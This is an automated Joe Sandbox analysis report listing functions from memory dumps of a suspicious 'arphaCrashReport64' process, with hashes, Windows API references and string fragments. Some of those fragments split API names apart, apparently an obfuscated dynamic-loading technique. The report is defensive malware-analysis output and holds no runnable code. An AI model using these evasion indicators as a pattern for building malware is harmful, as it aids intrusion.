                                            • Opcode ID: 66ac2fbe91f68a041350f3fc75b90513e980b9dbad4e79f1f9fa877e40f81b0e
                                            • Instruction ID: 41f270c2c57eab744e4d87e52c972e3427071cd4903100c3084456e63d536419
                                            • Opcode Fuzzy Hash: 66ac2fbe91f68a041350f3fc75b90513e980b9dbad4e79f1f9fa877e40f81b0e
                                            • Instruction Fuzzy Hash: CB318F32214FC08AEB61CF25E84439E73A9F788798F55011AEB9D43B99DF38C559CB04
                                            Function 0000024B642A81C0 Relevance: 12.3, APIs: 8, Instructions: 289COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno_invalid_parameter_noinfowcomexecmd
                                            • String ID:
                                            • API String ID: 1728837525-0
                                            • Opcode ID: 1ecebbeb37ace30139545a725b505b88b7ff7d913080444dcc587744223f7780
                                            • Instruction ID: 5d0078b6a801d5888fd4d57a61c436bc44124ee81805f261a58aa86b8b0df428
                                            • Opcode Fuzzy Hash: 1ecebbeb37ace30139545a725b505b88b7ff7d913080444dcc587744223f7780
                                            • Instruction Fuzzy Hash: 4D81BE20734E480BFF5AEB39441E37A72D9FB94304F6246299C56C31DEDF20D88D424A
                                            Function 00007FFDFB8B15B0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                            • String ID:
                                            • API String ID: 3778485334-0
                                            • Opcode ID: 6eb1e280ffd545d9ea5f3ba5caa03afdfb50de2afe5b7a31703c45140b1f897e
                                            • Instruction ID: 15fc2bd21d6e594f555aee650344601668a8e1fc4536516e52a54b80c3024510
                                            • Opcode Fuzzy Hash: 6eb1e280ffd545d9ea5f3ba5caa03afdfb50de2afe5b7a31703c45140b1f897e
                                            • Instruction Fuzzy Hash: C7310835B2AB4385EB109B25F860B6977A4FBC4754F508035D9AE427F8DF7CE0498B80
                                            Function 0000024B64592C00 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                            • String ID:
                                            • API String ID: 3778485334-0
                                            • Opcode ID: e3b3019c4e1a7badf9853d60fceb95a9add7947f81aaf153f24320ccf22126c7
                                            • Instruction ID: dcd3956627fecb6c83cdaf925ad20086cd0612cb07a21831a4060a0cd311e43d
                                            • Opcode Fuzzy Hash: e3b3019c4e1a7badf9853d60fceb95a9add7947f81aaf153f24320ccf22126c7
                                            • Instruction Fuzzy Hash: 8E313B35104F84C5EB969F55F85836A73A9F789754F520016EA8D43BADEF7CC088CB09
                                            Function 0000024B64594565 Relevance: 12.1, APIs: 8, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                            • String ID:
                                            • API String ID: 3778485334-0
                                            • Opcode ID: a3f95b96577147f573111d4e9550727bed5d12e695e8ac549579d4f579014c10
                                            • Instruction ID: 28ec69cbe11f4cc511fa7106a95295bf9ee9c71160c59a4b59e799c3d0baac9c
                                            • Opcode Fuzzy Hash: a3f95b96577147f573111d4e9550727bed5d12e695e8ac549579d4f579014c10
                                            • Instruction Fuzzy Hash: 4A313B35104F84CAE7969F51F85835AB3AAF789754F02001AEA8D03B6DEF7DC088CB09
                                            Function 0000024B642A6E70 Relevance: 10.9, APIs: 7, Instructions: 423COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_get_daylight_invalid_parameter_noinfo$free$___lc_codepage_func__wtomb_environ_getptd_lock
                                            • String ID:
                                            • API String ID: 4268574505-0
                                            • Opcode ID: c1fa7f40eb7c03d34230419b027a93e70f574f0f58e1d6dfd72d0dfeb88afd4a
                                            • Instruction ID: fea9180f4c0c68497b1de839d39653931a0236283c60260bb1f7cb836b262389
                                            • Opcode Fuzzy Hash: c1fa7f40eb7c03d34230419b027a93e70f574f0f58e1d6dfd72d0dfeb88afd4a
                                            • Instruction Fuzzy Hash: 7FD1E030638B444FEB2AEF289849769B7D9FBC5300F55552D98CAC319EDF30D886864D
                                            Function 0000024B64599FFC Relevance: 10.6, APIs: 7, Instructions: 143COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: InfoLocalefree$ErrorLastSleep
                                            • String ID:
                                            • API String ID: 3746651342-0
                                            • Opcode ID: bbf915b0126b6d411513f53f6a3ce8459f423b85cd882378f28b7d3cfe934764
                                            • Instruction ID: 67c62ae0f27ca3b16a697c5e42eccdf84d01bbbc32343cea0248724fbacbeb8c
                                            • Opcode Fuzzy Hash: bbf915b0126b6d411513f53f6a3ce8459f423b85cd882378f28b7d3cfe934764
                                            • Instruction Fuzzy Hash: D7512512B11FC452F7625B22A81876A26DFBB98BC8F164025DF0947B8EEF38CC058319
                                            Function 00007FFDFB8B233C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 1269745586-0
                                            • Opcode ID: 6035160a0f781e1d9fd4713ad2ab57f1a6b0803e30aafb7e3256b55d575f6e9d
                                            • Instruction ID: 73a3340825f21a9e40318f97c796eae0ef6d025a8b343341991b2e524b5f17a1
                                            • Opcode Fuzzy Hash: 6035160a0f781e1d9fd4713ad2ab57f1a6b0803e30aafb7e3256b55d575f6e9d
                                            • Instruction Fuzzy Hash: CF314B32A2DB8282DB249F65E4647AAB3A0FBC9744F004135DA9D43BA9DF7CD149CF40
                                            Function 0000024B64584380 Relevance: 9.1, APIs: 6, Instructions: 53windowclipboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Message$ClipboardSend$ChainChangeDestroyPostQuitViewerWindow
                                            • String ID:
                                            • API String ID: 267668081-0
                                            • Opcode ID: 082f6aee9610bfdf75166013c68e509d110115bbd60ee7658a241065df36a9e0
                                            • Instruction ID: 0e7dbf5f8e8a9b4216e910d1446fb1c1fa6f9194f3e4da6bbdcc66c881134658
                                            • Opcode Fuzzy Hash: 082f6aee9610bfdf75166013c68e509d110115bbd60ee7658a241065df36a9e0
                                            • Instruction Fuzzy Hash: E3012861B11C4183F76B0BB5BC4D36911DEEB4C729F4B1021C91986AA8EF2CC9EA820C
                                            Function 0000024B6459CDF8 Relevance: 7.7, APIs: 5, Instructions: 165COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: InfoLocale$_amsg_exit_getptd
                                            • String ID:
                                            • API String ID: 3133215516-0
                                            • Opcode ID: ee009b1be5d3d2cde25756b1d45347cc96b5970ab7b8554e0b603cf54b10ec7e
                                            • Instruction ID: 5ec07e35be0f87778c01af6ecac8f0bef236a17f9e36e01588354dcc5c3a472a
                                            • Opcode Fuzzy Hash: ee009b1be5d3d2cde25756b1d45347cc96b5970ab7b8554e0b603cf54b10ec7e
                                            • Instruction Fuzzy Hash: C9716C32310EC5A7EB6E8F71DA487D9B3AAF788745F424029D71A87288DB38D469C704
                                            Function 0000024B6459E600 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: InfoLocale$ByteCharMultiWidefree
                                            • String ID:
                                            • API String ID: 40707599-0
                                            • Opcode ID: 782c2ae40ed6df9be33f17baac5655201d48837b5c5e04d882e25822c50fe823
                                            • Instruction ID: 53497c3df85a1fc5d8ae19fc06d91e29c59aa7c28de3573a506e0f9133025ac7
                                            • Opcode Fuzzy Hash: 782c2ae40ed6df9be33f17baac5655201d48837b5c5e04d882e25822c50fe823
                                            • Instruction Fuzzy Hash: BA418232301FC096EB628F25E80865977DAF758BE8F5A4612EF5957BD8DB38C501C308
                                            Function 0000024B6458FCF0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 292fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleWrite
                                            • String ID: GET
                                            • API String ID: 1065093856-1805413626
                                            • Opcode ID: 124d72cd5e7ec1440d321d034adbaa2753bffeffca805573d9e122f8d0dd9c20
                                            • Instruction ID: d47a0616a3c911d723ae9779a8f38c53dcd5c3dc82d235ea15cd68f71ba616d3
                                            • Opcode Fuzzy Hash: 124d72cd5e7ec1440d321d034adbaa2753bffeffca805573d9e122f8d0dd9c20
                                            • Instruction Fuzzy Hash: 14D18F32214E8096F726DB21E84875E37BAF386B98F514915DF9607B9ACF78C098C748
                                            Function 0000024B64596CAC Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$_getptd$CurrentProcessSleep_amsg_exitmalloc
                                            • String ID:
                                            • API String ID: 2889500207-0
                                            • Opcode ID: cf6d3bac5b4105b9189a72264d0d1fb0f41da62099fa96747caf025d74721c30
                                            • Instruction ID: e696fa80612b5bd915d1dd7cb24e3137063e87ac360d1c7990cb788dabbc1fe3
                                            • Opcode Fuzzy Hash: cf6d3bac5b4105b9189a72264d0d1fb0f41da62099fa96747caf025d74721c30
                                            • Instruction Fuzzy Hash: 23A1F232205BC1A6EB26DF25E58879E77A9F348788F124126EF4D47B58EF38D449CB04
                                            Function 0000024B645924A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 229memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AllocLocal
                                            • String ID: base
                                            • API String ID: 3494564517-3233087073
                                            • Opcode ID: c0878f8b671855057f65a3e5919f93ea18debb5403dee10f9da02fb6507d340e
                                            • Instruction ID: 81833717072b87bc1f6be258013a6e3490ece527c7bfd522e1fe4df9498c665c
                                            • Opcode Fuzzy Hash: c0878f8b671855057f65a3e5919f93ea18debb5403dee10f9da02fb6507d340e
                                            • Instruction Fuzzy Hash: B0914662701EC086EB56CB26D0543AE77A6F388F94F15C515EF490BB99DF38C892C744
                                            Function 0000024B64582380 Relevance: 5.2, APIs: 4, Instructions: 244memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,00000000,00000000,?,0000024B645822C7), ref: 0000024B645824B6
                                            • VirtualFree.KERNEL32(?,?,00000000,00000000,?,0000024B645822C7), ref: 0000024B645824F0
                                            • VirtualAlloc.KERNEL32(?,?,00000000,00000000,?,0000024B645822C7), ref: 0000024B64582643
                                            • VirtualFree.KERNEL32(?,?,00000000,00000000,?,0000024B645822C7), ref: 0000024B64582678
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: a19bc9080f5a4c36b6c4d71dfdc3790bb118157c9ac63d932897b30f627c45a0
                                            • Instruction ID: 9c9b11cec32927b8b4c4b75309c385422df5eb288583b36240aad256643f092a
                                            • Opcode Fuzzy Hash: a19bc9080f5a4c36b6c4d71dfdc3790bb118157c9ac63d932897b30f627c45a0
                                            • Instruction Fuzzy Hash: 50A11732300EA09BEB1ACF2AC1587AD7BAAF744B84F028519EF1A57758DF34D891C744
                                            Function 0000024B642AB0FC Relevance: 107.8, APIs: 86, Instructions: 270COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$_errno
                                            • String ID:
                                            • API String ID: 2288870239-0
                                            • Opcode ID: 3bcfeb3b4da4738ff2c8081cfba52b5849e1802a269629de1be72a8479a25d7c
                                            • Instruction ID: f6d686966acefabef4a473f11ee97ce1800e15df4bd40cfec4f9ecf871657568
                                            • Opcode Fuzzy Hash: 3bcfeb3b4da4738ff2c8081cfba52b5849e1802a269629de1be72a8479a25d7c
                                            • Instruction Fuzzy Hash: C2B165302319084BEA8AEF55C4E97D8A395BB48740F6941B5DC4D8A6AFCF12DC8DCB58
                                            Function 0000024B6459B744 Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errno
                                            • String ID:
                                            • API String ID: 1012874770-0
                                            • Opcode ID: 3bcfeb3b4da4738ff2c8081cfba52b5849e1802a269629de1be72a8479a25d7c
                                            • Instruction ID: 5e76c2a0003387f35229cfe51ad5add05e657f915725b69ced58d54802b3e1f5
                                            • Opcode Fuzzy Hash: 3bcfeb3b4da4738ff2c8081cfba52b5849e1802a269629de1be72a8479a25d7c
                                            • Instruction Fuzzy Hash: 94A15521211A88F5EA42BB31D8B93DC132AAFC9F85F495532DB4DDB96BCF10CE458354
                                            Function 00007FFDFB8B5C90 Relevance: 67.6, APIs: 43, Strings: 2, Instructions: 94COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errno
                                            • String ID: RegOpenKeyExW$eyExW
                                            • API String ID: 1012874770-580866691
                                            • Opcode ID: 8bd799ee43dc6223234b6bf2e8a519622c0d060a50e6a2483f053fe225e5dac6
                                            • Instruction ID: a1d01a81b9caaa0987775a9640b158d78fb3f25c9c81d343025a05d4861b8de7
                                            • Opcode Fuzzy Hash: 8bd799ee43dc6223234b6bf2e8a519622c0d060a50e6a2483f053fe225e5dac6
                                            • Instruction Fuzzy Hash: 18417423F3654381EB45BB35C461ABC1720AFC9B49F548131D96D6E1FBCE14D845CB90
                                            Function 0000024B645832F0 Relevance: 42.1, APIs: 4, Strings: 20, Instructions: 69libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: .dll$File$File$GetS$Kern$Time$Time$Time$ToLo$ToSy$calF$eAsF$el32$ileT$ileT$ime$ime$mTim$stem$yste
                                            • API String ID: 2238633743-1498238681
                                            • Opcode ID: ff00a95b1e228d669d7c747e6a3e4753806e95f8e25970bfa9467526f097a296
                                            • Instruction ID: d8df41dd09b2e0197166eb448f38873395bc4deeface171f1992a26f0cfb69b7
                                            • Opcode Fuzzy Hash: ff00a95b1e228d669d7c747e6a3e4753806e95f8e25970bfa9467526f097a296
                                            • Instruction Fuzzy Hash: 21311672600A81DEEB40CFA5E59539C3B75F704B88F41551AEA091BB0CDB34C249CB49
                                            Function 0000024B6459E7CC Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL$ceil
                                            • API String ID: 2643518689-1731902841
                                            • Opcode ID: dc7f515bce058812213eff212fecdc56bb59c3819f4b3c80438f9d8dd1d00741
                                            • Instruction ID: 37d5dae106372b70808adad48b649099c1b277633b915e4cb01e32b8f80bfc37
                                            • Opcode Fuzzy Hash: dc7f515bce058812213eff212fecdc56bb59c3819f4b3c80438f9d8dd1d00741
                                            • Instruction Fuzzy Hash: B651FE24602F8581FE97EB55BC5C325279EBB45B90F4A102ADE0E07798EF38C489C349
                                            Function 0000024B64583160 Relevance: 38.6, APIs: 6, Strings: 16, Instructions: 86libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: .dll$Adva$Allo$AndI$Chec$Free$Sid$aliz$cate$eSid$enMe$kTok$mber$niti$pi32$ship
                                            • API String ID: 2574300362-3843195497
                                            • Opcode ID: 04621738c0442ffbcc8d80509db345bcb3724ddbb18c76e5f94587bdcebbe584
                                            • Instruction ID: a1724337beabab6fd2c01a5b706615d9e9289bee1bd6512f7ba369ef8629d4ac
                                            • Opcode Fuzzy Hash: 04621738c0442ffbcc8d80509db345bcb3724ddbb18c76e5f94587bdcebbe584
                                            • Instruction Fuzzy Hash: A4416672A04B81DEE710CFA5E49439D7BB4F748788F41501AEA4957B1CDB78C259CB44
                                            Function 00007FFDFB8B5858 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5895
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B58B1
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B58D9
                                            • EncodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B58E2
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B58F8
                                            • EncodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5901
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5917
                                            • EncodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5920
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B593E
                                            • EncodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5947
                                            • DecodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5979
                                            • DecodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5988
                                            • DecodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B59E0
                                            • DecodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5A00
                                            • DecodePointer.KERNEL32(?,?,?,?,?,000000FC,00000000,00007FFDFB8B41A8,?,?,?,?,?,00007FFDFB8B423C), ref: 00007FFDFB8B5A19
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
